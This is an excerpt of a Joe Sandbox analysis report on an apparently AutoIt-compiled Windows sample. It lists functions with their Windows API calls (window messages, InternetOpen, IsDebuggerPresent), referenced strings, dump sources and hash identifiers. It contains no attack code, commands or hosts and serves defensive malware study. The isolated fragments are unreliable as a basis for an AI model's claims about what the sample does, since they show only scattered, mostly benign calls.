                                                                                                    • Opcode Fuzzy Hash: b71c253b25b857e117a65a547f31953e55ba1bb17e11412346f0cc940e15b714
                                                                                                    • Instruction Fuzzy Hash: ED312C72D00219ABCF15EFA4CD85AEEBFB9FF09340F500059F815B61A1DB35AA56CB50
                                                                                                    APIs
                                                                                                    • DestroyWindow.USER32(?,?,?,?), ref: 00B33621
                                                                                                    • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00B3365C
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Window$DestroyMove
                                                                                                    • String ID: static
                                                                                                    • API String ID: 2139405536-2160076837
                                                                                                    • Opcode ID: c8e1cf686da276855b4f9aeb11c34b6d918f002e52f2679b7282c1593c632cd4
                                                                                                    • Instruction ID: bf73af9397943c3af09fedb5a8c14771149a7f2ea8737ac7b016bdefaab204ea
                                                                                                    • Opcode Fuzzy Hash: c8e1cf686da276855b4f9aeb11c34b6d918f002e52f2679b7282c1593c632cd4
                                                                                                    • Instruction Fuzzy Hash: 93319E71110604AEDB109F68DC81EFB73E9FF98B20F219619F8A5D7290DB30AD91C760
                                                                                                    APIs
                                                                                                    • SendMessageW.USER32(?,00001132,00000000,?), ref: 00B3461F
                                                                                                    • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00B34634
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MessageSend
                                                                                                    • String ID: '
                                                                                                    • API String ID: 3850602802-1997036262
                                                                                                    • Opcode ID: 220b115f6e9895c718e3357e5ac561c74430c4f732dbf91779dd0b6602392304
                                                                                                    • Instruction ID: b44a47e0b78a1ccd07b497d0e4871f2626c4ffdcd7f151c0d10d7dba36af7889
                                                                                                    • Opcode Fuzzy Hash: 220b115f6e9895c718e3357e5ac561c74430c4f732dbf91779dd0b6602392304
                                                                                                    • Instruction Fuzzy Hash: 84312574A0020A9FDF14CFA9C981BDABBF5FF19300F2144AAE904AB381D770A941CF90
                                                                                                    APIs
                                                                                                    • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00AE33A2
                                                                                                      • Part of subcall function 00AA6B57: _wcslen.LIBCMT ref: 00AA6B6A
                                                                                                    • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00AA3A04
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: IconLoadNotifyShell_String_wcslen
                                                                                                    • String ID: Line:
                                                                                                    • API String ID: 2289894680-1585850449
                                                                                                    • Opcode ID: 0c8acbb34372973b6f25b48b58b108df08078d371bf617d81b4bcad391608107
                                                                                                    • Instruction ID: 6ee7929052be2a5ba4590b35e3a00901c2ffea790ecf7f53a9c0d04f53d65f76
                                                                                                    • Opcode Fuzzy Hash: 0c8acbb34372973b6f25b48b58b108df08078d371bf617d81b4bcad391608107
                                                                                                    • Instruction Fuzzy Hash: CD31C472408300AACB21EB28DC46FEFB7E8AB45710F10491EF59A971D1DF749A48C7E6
                                                                                                    APIs
                                                                                                    • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00B3327C
                                                                                                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00B33287
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MessageSend
                                                                                                    • String ID: Combobox
                                                                                                    • API String ID: 3850602802-2096851135
                                                                                                    • Opcode ID: 6b131e91a87b177d2ae4ab5194d9af040100fc31d7944fc69da634915dc3262d
                                                                                                    • Instruction ID: ae116f3da42401ae605f9b6bf53252b0191ca3605b672505cbd35c291d707bdc
                                                                                                    • Opcode Fuzzy Hash: 6b131e91a87b177d2ae4ab5194d9af040100fc31d7944fc69da634915dc3262d
                                                                                                    • Instruction Fuzzy Hash: 7B11C8713002087FFF219F54DC81EBB37EAEB54764F204264F51897290D671DD518760
                                                                                                    APIs
                                                                                                      • Part of subcall function 00AA600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00AA604C
                                                                                                      • Part of subcall function 00AA600E: GetStockObject.GDI32(00000011), ref: 00AA6060
                                                                                                      • Part of subcall function 00AA600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 00AA606A
                                                                                                    • GetWindowRect.USER32(00000000,?), ref: 00B3377A
                                                                                                    • GetSysColor.USER32(00000012), ref: 00B33794
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                                                                    • String ID: static
                                                                                                    • API String ID: 1983116058-2160076837
                                                                                                    • Opcode ID: d7f797c82d9a16e65198638aaa90e84c02fa7c21abcc81520a674d8c9e67b3e9
                                                                                                    • Instruction ID: 2ae8dc0e7bb6453815c0d6eb7027c02bac08b637a7eb02813ee0fe598d4e764b
                                                                                                    • Opcode Fuzzy Hash: d7f797c82d9a16e65198638aaa90e84c02fa7c21abcc81520a674d8c9e67b3e9
                                                                                                    • Instruction Fuzzy Hash: 9F1126B2610209AFDF00DFA8CC46EEA7BF8EB08714F114954F955E3250EB39E8619B60
                                                                                                    APIs
                                                                                                    • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00B1CD7D
                                                                                                    • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00B1CDA6
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Internet$OpenOption
                                                                                                    • String ID: <local>
                                                                                                    • API String ID: 942729171-4266983199
                                                                                                    • Opcode ID: b831366131b4f3542494ad7700b3a5f5c62020a808a7458020471f074fd8a930
                                                                                                    • Instruction ID: d8f6ebe54d571403eb9c7e6ee8aefe5f77eb39008ecb18bf861fe9e18336c103
                                                                                                    • Opcode Fuzzy Hash: b831366131b4f3542494ad7700b3a5f5c62020a808a7458020471f074fd8a930
                                                                                                    • Instruction Fuzzy Hash: E2110671281631BAD7344B669C84EE7BEECEF127A4F9042B6B11993090D7709980D6F0
                                                                                                    APIs
                                                                                                    • GetWindowTextLengthW.USER32(00000000), ref: 00B334AB
                                                                                                    • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00B334BA
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: LengthMessageSendTextWindow
                                                                                                    • String ID: edit
                                                                                                    • API String ID: 2978978980-2167791130
                                                                                                    • Opcode ID: 9da34ccaa1c854225daf13f4069869f775259d27ce15cdf60f501441d71b57a9
                                                                                                    • Instruction ID: 3e4d8b5bf286bb0f17690089dcbacb80bbb67416f0c9995b220b520e5bf307a9
                                                                                                    • Opcode Fuzzy Hash: 9da34ccaa1c854225daf13f4069869f775259d27ce15cdf60f501441d71b57a9
                                                                                                    • Instruction Fuzzy Hash: 6F118F71100208ABEB124F64DC85AAB3BEAEB15B74F604764F965A72E0C771DC919B60
                                                                                                    APIs
                                                                                                      • Part of subcall function 00AA9CB3: _wcslen.LIBCMT ref: 00AA9CBD
                                                                                                    • CharUpperBuffW.USER32(?,?,?), ref: 00B06CB6
                                                                                                    • _wcslen.LIBCMT ref: 00B06CC2
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _wcslen$BuffCharUpper
                                                                                                    • String ID: STOP
                                                                                                    • API String ID: 1256254125-2411985666
                                                                                                    • Opcode ID: 4851bf9eafde6ff3944febc545d4c08d2c4c4ae5cbb104e3ec21b3b798743b4c
                                                                                                    • Instruction ID: f4ecf05cea2b1c3766c23eab6a0d7470449604d4b8f27bbf92dcf7b736d7d2cf
                                                                                                    • Opcode Fuzzy Hash: 4851bf9eafde6ff3944febc545d4c08d2c4c4ae5cbb104e3ec21b3b798743b4c
                                                                                                    • Instruction Fuzzy Hash: FF01C032A0052A8BEB21AFBDDD819BF7BE5EA65710B100679E862971D0EB31D960C650
                                                                                                    APIs
                                                                                                      • Part of subcall function 00AA9CB3: _wcslen.LIBCMT ref: 00AA9CBD
                                                                                                      • Part of subcall function 00B03CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00B03CCA
                                                                                                    • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00B01D4C
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ClassMessageNameSend_wcslen
                                                                                                    • String ID: ComboBox$ListBox
                                                                                                    • API String ID: 624084870-1403004172
                                                                                                    • Opcode ID: ea344e70f27b04aeb3a59db5f2a92aaaeedab543bbb071d43f98bb70488bd0ba
                                                                                                    • Instruction ID: e5ef1873a167699f0ca0865b3e132cd28558856ffcfcc16ce396a3bf8dd1b544
                                                                                                    • Opcode Fuzzy Hash: ea344e70f27b04aeb3a59db5f2a92aaaeedab543bbb071d43f98bb70488bd0ba
                                                                                                    • Instruction Fuzzy Hash: C201B571601218ABCB18EFA4CD558FF7BE8EB46350B140A99F822672D1EA3459088660
                                                                                                    APIs
                                                                                                      • Part of subcall function 00AA9CB3: _wcslen.LIBCMT ref: 00AA9CBD
                                                                                                      • Part of subcall function 00B03CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00B03CCA
                                                                                                    • SendMessageW.USER32(?,00000180,00000000,?), ref: 00B01C46
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ClassMessageNameSend_wcslen
                                                                                                    • String ID: ComboBox$ListBox
                                                                                                    • API String ID: 624084870-1403004172
                                                                                                    • Opcode ID: 0c1f140b84fc94ee3b7465bacb39f21cda3f68325d3b85f92be0f6627bd8074c
                                                                                                    • Instruction ID: d38bdbdc74cca1e322ea372c2a2a0688551e608d7c55a85df07b8c39f2b9ea7f
                                                                                                    • Opcode Fuzzy Hash: 0c1f140b84fc94ee3b7465bacb39f21cda3f68325d3b85f92be0f6627bd8074c
                                                                                                    • Instruction Fuzzy Hash: 5B01F7716801086BDB28EB94CA529FF7BE8DB16340F140499B406772C1EE24DE4886B1
                                                                                                    APIs
                                                                                                      • Part of subcall function 00AA9CB3: _wcslen.LIBCMT ref: 00AA9CBD
                                                                                                      • Part of subcall function 00B03CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00B03CCA
                                                                                                    • SendMessageW.USER32(?,00000182,?,00000000), ref: 00B01CC8
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ClassMessageNameSend_wcslen
                                                                                                    • String ID: ComboBox$ListBox
                                                                                                    • API String ID: 624084870-1403004172
                                                                                                    • Opcode ID: 0b381ff569c258b79d14af2ff7eaf2e45d118773b63c1323cb889c9e42f52997
                                                                                                    • Instruction ID: ffd989195f0dac9a87e528556594b18fb59b74584fa5279a1ffaf539ebff1831
                                                                                                    • Opcode Fuzzy Hash: 0b381ff569c258b79d14af2ff7eaf2e45d118773b63c1323cb889c9e42f52997
                                                                                                    • Instruction Fuzzy Hash: 4701DB7164011867DB28EB94CB55AFF7BECDB12380F140455B801772C1EE24DF18C671
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _wcslen
                                                                                                    • String ID: 3, 3, 16, 1
                                                                                                    • API String ID: 176396367-3042988571
                                                                                                    • Opcode ID: 64314b9cc58334d9193530f0bea0d788aa0526c1d9b3f552f53439bc798498a6
                                                                                                    • Instruction ID: ef47896783fac19fde9a2a6ec60e751b5d77d92f49251f8e146aaaa2c97f76d2
                                                                                                    • Opcode Fuzzy Hash: 64314b9cc58334d9193530f0bea0d788aa0526c1d9b3f552f53439bc798498a6
                                                                                                    • Instruction Fuzzy Hash: 78E02B066542301092313279BDC1EBF56C9CFC9750710186FF999C236AEEA48D9293AC
                                                                                                    APIs
                                                                                                    • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00B00B23
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Message
                                                                                                    • String ID: AutoIt$Error allocating memory.
                                                                                                    • API String ID: 2030045667-4017498283
                                                                                                    • Opcode ID: 5076d5ce795528c608df6194a2749c20890730cf11c672033847e7c9991f3f01
                                                                                                    • Instruction ID: a0b164f5bd323f98a5c75aae5ce9e17fde5a9b9e418c363d421d6581e0058fd4
                                                                                                    • Opcode Fuzzy Hash: 5076d5ce795528c608df6194a2749c20890730cf11c672033847e7c9991f3f01
                                                                                                    • Instruction Fuzzy Hash: E4E0D8322443182AD21036947D03FC97FC8CF05B11F24046AFB58654D38BE1645007E9
                                                                                                    APIs
                                                                                                      • Part of subcall function 00ABF7C9: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,00AC0D71,?,?,?,00AA100A), ref: 00ABF7CE
                                                                                                    • IsDebuggerPresent.KERNEL32(?,?,?,00AA100A), ref: 00AC0D75
                                                                                                    • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,00AA100A), ref: 00AC0D84
                                                                                                    Strings
                                                                                                    • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00AC0D7F
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString
                                                                                                    • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                                                    • API String ID: 55579361-631824599
                                                                                                    • Opcode ID: 48614ac4fab4c8af7e4c8f747f8ce5ce72b2fd10219c93358ce3838a1f8d437a
                                                                                                    • Instruction ID: 7e7074e66c8a27b06820b227f7237b4adf94d61ab1980ed2fe624ce322ede13d
                                                                                                    • Opcode Fuzzy Hash: 48614ac4fab4c8af7e4c8f747f8ce5ce72b2fd10219c93358ce3838a1f8d437a
                                                                                                    • Instruction Fuzzy Hash: F3E06D702003118BD3619FBCD904B567BE4AB00740F11496DE887D7661EFB4E4848BA1
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: LocalTime
                                                                                                    • String ID: %.3d$X64
                                                                                                    • API String ID: 481472006-1077770165
                                                                                                    • Opcode ID: 65d8f9301ba33947f4edcbaab52448f72d99a2611ee295119ab9b5d9e2254b56
                                                                                                    • Instruction ID: e4ec695414edee3bb04aff097f87698860de312dff6f47488b9d79a1bd98bb21
                                                                                                    • Opcode Fuzzy Hash: 65d8f9301ba33947f4edcbaab52448f72d99a2611ee295119ab9b5d9e2254b56
                                                                                                    • Instruction Fuzzy Hash: 1BD012B180810CE9CB5197D0CC458FAB7BDFB08341F608452FA06A2041E634C50867A1
                                                                                                    APIs
                                                                                                    • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00B3232C
                                                                                                    • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00B3233F
                                                                                                      • Part of subcall function 00B0E97B: Sleep.KERNEL32 ref: 00B0E9F3
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FindMessagePostSleepWindow
                                                                                                    • String ID: Shell_TrayWnd
                                                                                                    • API String ID: 529655941-2988720461
                                                                                                    • Opcode ID: 0152af608e82e6fd7f61ad0c01f78029c2b3363cc4bd39c58aa33c3710cc21d9
                                                                                                    • Instruction ID: 2e773cf9b9ef47f4c363aaadf8e5b1fb74028b31592195ee84950eef5967d599
                                                                                                    • Opcode Fuzzy Hash: 0152af608e82e6fd7f61ad0c01f78029c2b3363cc4bd39c58aa33c3710cc21d9
                                                                                                    • Instruction Fuzzy Hash: AED0C936394310B6E664A7B09C0FFDA7E54AB10B10F1149567655BB1E0C9B4A8018B54
                                                                                                    APIs
                                                                                                    • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00B3236C
